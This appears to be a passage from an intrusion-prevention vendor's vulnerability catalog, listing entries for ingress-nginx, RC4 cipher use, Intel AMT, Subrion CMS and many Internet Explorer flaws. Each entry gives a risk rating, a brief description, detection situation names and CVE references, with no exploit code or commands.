https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1974

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-24514

About this vulnerability:

An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes

Risk:

High

First detected in:

sgpkg-ips-1856-5242

Last changed:

sgpkg-ips-1856-5242

Platform:

Generic

Software:

ingress-nginx

Type:

Input Validation

Description:

A security issue was discovered in ingress-nginx where the "auth-url" ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.

Situation:

File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection

References:

CVE-2025-24514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24514

Insecure-Rc4-Cipher-Suite

About this vulnerability:

Insecure RC4 Cipher Suite

Risk:

Moderate

First detected in:

sgpkg-ips-737-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenSSL

Type:

Configuration Error

Description:

The RC4 stream cipher has multiple cryptographic weaknesses and it has been deemed unsecure. Its usage has been prohibited my the IETF.

Situation:

HTTPS_SS-Insecure-Rc4-Cipher-Suite-Usage

References:

CVE-2015-2808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808

Insecure-Root-Login

About this vulnerability:	Root login cleartext protocol
Risk:	Low
First detected in:	sgpkg-ips-253-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	This vulnerability is referenced by fingerprints that detect root login attempts via FTP or Telnet protocol. These protocols transfer all data between the client and the server in cleartext making it possible for third parties to listen for sensitive data such as passwords.
Situation:	Telnet_STS-Telnet-Root-Login-Attempt

Insecure-X-Server-Allows-Sniffing

About this vulnerability:

Vulnerable X server - allows sniffing

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic X server

Type:

Misconfiguration

Description:

Some X servers have disabled authentication. This allows remote hosts to access the X server's resources. This means the capability of logging key strokes, mouse movements and stealing screen captures.

Situation:

X11_Remote-XOpen

References:

CVE-1999-0526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0526

IntegraXOR-SQL-Injection

About this vulnerability:	A vulnerability in IntegraXOR
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IntegraXOR
Type:	SQL Injection
Description:	There is an SQL injection vulnerability in IntegraXOR which allows an attacker to modify data and read/write arbitrary files.
Situation:	HTTP_CRL-IntegraXOR-SQL-Injection

Intel-AMT-And-ISM-Privilege-Escalation-CVE-2020-8758

About this vulnerability:

A privilege escalation vulnerability in Intel AMT and Intel ISM

Risk:

High

First detected in:

sgpkg-ips-1275-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Intel AMT; Intel ISM

Type:

Input Validation

Description:

A privilege escalation vulnerability exists in Intel Active Management Technology (AMT), and Intel Standard Manageability (ISM). The vulnerability is due to improper buffer restrictions in network subsystems in versions before 11.8.79, 11.12.79, 11.22.79, 12.0.68 and 14.0.39.

Situation:

HTTP_CSH-Negative-Content-Length-Value
HTTP_CSH-Invalid-Negative-Content-Length-Value

References:

CVE-2020-8758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8758

Intel-AMT-CVE-2017-5689

About this vulnerability:

A vulnerability in Intel AMT

Risk:

High

First detected in:

sgpkg-ips-899-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Intel AMT

Type:

Input Validation

Description:

A remote attacker can manage the AMT with admin rights without knowledge of the password. The vulnerability has been named "Silent Bob is silent".

Situation:

HTTP_CHS-Intel-AMT-CVE-2017-5689

References:

CVE-2017-5689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689

Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005

About this vulnerability:

A vulnerability in Intelbras WiFiber

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Intelbras WiFiber

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Intelbras WiFiber 120AC inMesh device firmware before version 1-1-220826. An authenticated attacker could use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CRL-Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005

References:

CVE-2022-40005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40005

Intellian-Aptus-Web-OS-Command-Injection

About this vulnerability:

Intellian Aptus Web OS Command Injection

Risk:

Moderate

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Intellian Aptus Web OS

Type:

Malfunction

Description:

A command injection vulnerability in Intellian Aptus Web OS

Situation:

File-Text_Intellian-Aptus-Web-OS-Command-Injection

References:

CVE-2020-7980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7980

Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Subrion CMS detected

Risk:

High

First detected in:

sgpkg-ips-1677-5242

Last changed:

sgpkg-ips-1677-5242

Platform:

Generic

Software:

Subrion CMS

Type:

Input Validation

Description:

A vulnerability in Subrion CMS, versions 4.2.1 and before, which allows remote attackers to upload and execute arbitrary code due to the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files.

Situation:

HTTP_CS-Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE

References:

CVE-2018-19422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19422

IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in IntelliCom NetBiter Config

Risk:

High

First detected in:

sgpkg-ips-273-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IntelliCom NetBiter Config Utility

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the IntelliCom NetBiter Config utility. The vulnerability is due to a boundary error while parsing an overly long 'hn' (Hostname) parameter. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted UDP packet to port 3250 on the target host. Once the packet is received, a NetBiter Config console user must be enticed to open the received message. Successful exploitation allows arbitrary code execution on the target with the privileges of the currently logged on user.

Situation:

Generic_UDP-IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow

References:

CVE-2009-4462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4462

BID-37325
http://www.securityfocus.com/bid/37325

Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in Interactive Data eSignal detected

Risk:

Moderate

First detected in:

sgpkg-ips-425-4219

Last changed:

sgpkg-ips-1332-5242

Platform:

Generic

Software:

Interactive Data eSignal

Type:

Malfunction

Description:

A vulnerability in Interactive Data eSignal

Situation:

SMTP_CS-Interactive-Data-Esignal-Stack-Buffer-Overflow
File-Binary_Interactive-Data-Esignal-Stack-Buffer-Overflow
File-TextId_Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow

References:

CVE-2011-3494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3494

Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676

About this vulnerability:

A vulnerability in Internet Explorer 11.0

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Internet Explorer 11.0. Successful exploitation of this issue can result in information disclosure.

Situation:

File-Text_Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676

References:

CVE-2019-0676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0676

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting

About this vulnerability:

A cross-site scripting vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-101-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in Microsoft Internet Explorer 7. The vulnerability is due to an input validation error in the local resource page navcancl.htm when generating the page refresh link in Internet Explorer 7. Successful exploitation can allow the attacker to execute a cross-site scripting or phishing attack.

Situation:

HTTP_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
File-Text_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting

References:

CVE-2007-1499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1499

BID-22966
http://www.securityfocus.com/bid/22966

OSVDB-35352
http://www.osvdb.org/35352

MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033

Internet-Explorer-And-HTTP-Services-Authentication-Reflection-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An authentication reflection vulnerability exists in Microsoft Internet Explorer and Windows HTTP services. The flaw is due to a design weakness in the authentication challenge/response mechanism. Remote unauthenticated attackers can exploit this vulnerability by enticing a user to connect to a crafted HTTP server, and then connect back to the user's own SMB service utilizing the user's own challenge/response data. A successful exploitation can lead to arbitrary code execution within the security context of the affected user. The behaviour of the target host will depend on the SMB and/or DCE-RPC commands sent to the target after the SMB authentication is bypassed.

Situation:

SMB-TCP_Internet-Explorer-Authentication-Reflection-Code-Execution

References:

CVE-2009-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0550

BID-34439
http://www.securityfocus.com/bid/34439

OSVDB-53619
http://www.osvdb.org/53619

MS09-013
http://technet.microsoft.com/security/bulletin/MS09-013

Internet-Explorer-ASLR-Bypass-CVE-2015-0069

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0;Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Internet-Explorer-ASLR-Bypass-CVE-2015-0069

References:

CVE-2015-0069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0069

BID-72454
http://www.securityfocus.com/bid/72454

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Internet-Explorer-Cached-Objects-Zone-Bypass

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.5; Internet Explorer 6.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer that allows cached objects to bypass zone boundaries.

Situation:

HTTP_SS-Internet-Explorer-Cached-Objects-Zone-Bypass
File-Text_Internet-Explorer-Cached-Objects-Zone-Bypass

References:

CVE-2002-1254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1254

BID-6028
http://www.securityfocus.com/bid/6028

MS02-066
http://technet.microsoft.com/security/bulletin/MS02-066

Internet-Explorer-CDocument-Object-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A use-after-free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to a use-after-free error while handling the creation and assignment of attributes to objects which are subsequently modified/destroyed. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Internet-Explorer-CDocument-Object-Use-After-Free

References:

CVE-2013-3114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3114

BID-60384
http://www.securityfocus.com/bid/60384

OSVDB-94109
http://www.osvdb.org/94109

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Internet-Explorer-Chtskdic.dll-Com-Object-Instantiation-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-107-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The flaw is due to improper handling of a COM object implemented by chtskdic.dll that is not designed to work with Internet Explorer. By persuading a user to visit a malicious web site, a remote attacker may execute arbitrary code on the target system with the privileges of the currently logged on user.

Situation:

HTTP_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
File-Text_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability

References:

CVE-2007-0942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0942

BID-19529
http://www.securityfocus.com/bid/19529

OSVDB-34399
http://www.osvdb.org/34399

MS07-027
http://technet.microsoft.com/security/bulletin/MS07-027

Internet-Explorer-Cross-Domain-Information-Disclosure

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0

Type:

Malfunction

Description:

An information disclosure vulnerability exists when Internet Explorer does not properly enforce cross-domain policies, which could allow an attacker to gain access to information in another domain or Internet Explorer zone.

Situation:

HTTP_CSU-Internet-Explorer-Cross-Domain-Information-Disclosure

References:

CVE-2015-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0070

BID-72480
http://www.securityfocus.com/bid/72480

MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009

Internet-Explorer-CVE-2014-2795

About this vulnerability:

Detected attempt to exploit Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Detected attempt to exploit Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-CVE-2014-2795

References:

CVE-2014-2795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2795

BID-68379
http://www.securityfocus.com/bid/68379

MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037

Internet-Explorer-CVE-2014-2801

About this vulnerability:

Detected attempt to exploit Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-596-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

Detected attempt to exploit Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-CVE-2014-2801

References:

CVE-2014-2801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2801

BID-68383
http://www.securityfocus.com/bid/68383

MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037

Internet-Explorer-DirectAnimation.DAUserData.Data-DoS

About this vulnerability:

Internet Explorer DirectAnimation.DAUserData.Data DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Browser

Description:

A vulnerability exists in Internet Explorer versions 6 that allows remote attackers to cause a denial of service by accessing the Data property of a DirectAnimation DAUserData object before it is initialized.

Situation:

File-Text_Internet-Explorer-DirectAnimation.DAUserData.Data-DoS

References:

CVE-2006-3513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3513

BID-18902
http://www.securityfocus.com/bid/18902

OSVDB-27013
http://www.osvdb.org/27013

Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS

About this vulnerability:

Internet Explorer DirectAnimation.StructuredGraphicsControl.SourceURL DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Browser

Description:

A vulnerability exists in Internet Explorer versions 6 that allows remote attackers to trigger a null dereference and cause a denial of service by declaring sourceURL in an unitialized DirectAnimation.StructuredGraphicsControl ActiveX object.

Situation:

File-Text_Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS

References:

CVE-2006-3427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3427

BID-18855
http://www.securityfocus.com/bid/18855

OSVDB-26839
http://www.osvdb.org/26839

Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-624-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

File-Text_Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016

References:

CVE-2015-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0016

MS15-004
http://technet.microsoft.com/security/bulletin/MS15-004

Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles uninitialized or removed objects. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.

Situation:

HTTP_SS-Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
File-Text_Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption

References:

CVE-2007-5344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5344

BID-26817
http://www.securityfocus.com/bid/26817

MS07-069
http://technet.microsoft.com/security/bulletin/MS07-069

Internet-Explorer-Domain-Url-Spoofing

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

A URL spoofing vulnerability in Internet Explorer

Situation:

HTTP_CSU-Internet-Explorer-Domain-Url-Spoofing

References:

CVE-2003-1025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1025

BID-9182
http://www.securityfocus.com/bid/9182

MS04-004
http://technet.microsoft.com/security/bulletin/MS04-004

Internet-Explorer-File-Name-Spoofing

About this vulnerability:	A vulnerability in Internet Explorer
Risk:	High
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Internet Explorer
Type:	Input Validation
Description:	A vulnerability in Microsoft Internet Explorer will allows users to be deceived into opening a file of a different type than indicated by the file extension. Embedding a CLSID as well as the character '%2E' in a file name could deceive users into thinking a file is of a legitimate type and open it, allowing a malicious file to execute.
Situation:	HTTP_SHS-Internet-Explorer-File-Name-Spoofing

Internet-Explorer-getElementById-JavaScript-For-Loop-DoS

About this vulnerability:

Internet Explorer getElementById JavaScript For Loop DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Browser

Description:

A vulnerability exists in Internet Explorer 6 that allows remote attackers to trigger a denial of service by using an HTML JavaScript FOR loop with an empty body, while using the getElementById object.

Situation:

File-Text_Internet-Explorer-getElementById-JavaScript-For-Loop-DoS

References:

CVE-2007-0811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0811

BID-22408
http://www.securityfocus.com/bid/22408

OSVDB-37636
http://www.osvdb.org/37636

Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS

About this vulnerability:

Internet Explorer HtmlDlgSafeHelper Fonts DoS vulnerability.

Risk:

High

First detected in:

sgpkg-ips-670-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Browser

Description:

A vulnerability exists in Internet Explorer 6 that allows remote attackers to trigger a denial of service by setting the fonts property of the HtmlDlgSafeHelper ActiveX object.

Situation:

File-Text_Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS

References:

CVE-2006-3511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3511

BID-18929
http://www.securityfocus.com/bid/18929

OSVDB-27055
http://www.osvdb.org/27055

Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in Internet Explorer.

Situation:

File-Text_Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261

References:

CVE-2016-3261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3261

MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084

Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Risk:

Moderate

First detected in:

sgpkg-ips-428-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Internet Explorer detected

Situation:

HTTP_CSU-Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019

References:

CVE-2011-2019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2019

MS11-099
http://technet.microsoft.com/security/bulletin/MS11-099

Internet-Explorer-JPEG-Rendering-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer JPEG rendering

Risk:

Moderate

First detected in:

sgpkg-ips-34-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

Internet Explorer has a vulnerability in the JPEG image rendering that causes memory corruption. It may be possible for a remote attacker to exploit this vulnerability to execute arbitrary code on the victim machine.

Situation:

HTTP_Internet-Explorer-JPEG-Rendering-Memory-Corruption
E-Mail_BS-Internet-Explorer-JPEG-Rendering-Memory-Corruption
File-JPEG_Internet-Explorer-JPEG-Rendering-Memory-Corruption

References:

CVE-2005-1988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1988

BID-14282
http://www.securityfocus.com/bid/14282

MS05-038
http://technet.microsoft.com/security/bulletin/MS05-038

Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow

About this vulnerability:

Internet Explorer Long Hostname Memory Corruption Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-671-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A vulnerability exists in Internet Explorer, versions 5.01, 5.5, and 6, which allows remote attackers to cause a denial of service condition or possibly execute arbitrary code via a long hostname link withing the HTML code.

Situation:

File-Text_Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow

References:

CVE-2005-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0554

BID-13123
http://www.securityfocus.com/bid/13123

OSVDB-15464
http://www.osvdb.org/15464

MS05-020
http://technet.microsoft.com/security/bulletin/MS05-020

Internet-Explorer-Malformed-Gif-File-Double-Free

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A double free vulnerability exists in the way Microsoft Internet Explorer handles images of the GIF file format. This vulnerability can be exploited by enticing a user to view a web page or email message containing a specially crafted .gif file. Successful exploitation can lead to a client compromise and possible remote code execution.

Situation:

File-GIF_Internet-Explorer-Malformed-Gif-File-Double-Free

References:

CVE-2003-1048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1048

BID-8530
http://www.securityfocus.com/bid/8530

MS04-025
http://technet.microsoft.com/security/bulletin/MS04-025

Internet-Explorer-Memory-Corruption-CVE-2018-0870

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-Text_UTF-8-Title-In-HTML

References:

CVE-2018-0870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0870

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Internet-Explorer-Memory-Corruption-CVE-2018-0988

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Internet Explorer. A succesful exploit could lead to remote code execution in the security context of the current user.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-0988

References:

CVE-2018-0988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0988

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Internet-Explorer-Memory-Corruption-CVE-2018-8249

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-TextId_Internet-Explorer-Memory-Corruption-CVE-2018-8249

References:

CVE-2018-8249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8249

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Internet-Explorer-Memory-Corruption-CVE-2018-8267

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8267

References:

CVE-2018-8267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8267

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Internet-Explorer-Memory-Corruption-CVE-2018-8447

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists an out of bound vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8447

References:

CVE-2018-8447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8447

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Internet-Explorer-Memory-Corruption-CVE-2018-8461

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8461

References:

CVE-2018-8461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8461

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an out-of-bounds access error during keyframe creation when processing CSS and HTML code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099

References:

CVE-2015-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0099

BID-72925
http://www.securityfocus.com/bid/72925

MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-730-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063

References:

CVE-2016-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0063

MS16-009
http://technet.microsoft.com/security/bulletin/MS16-009

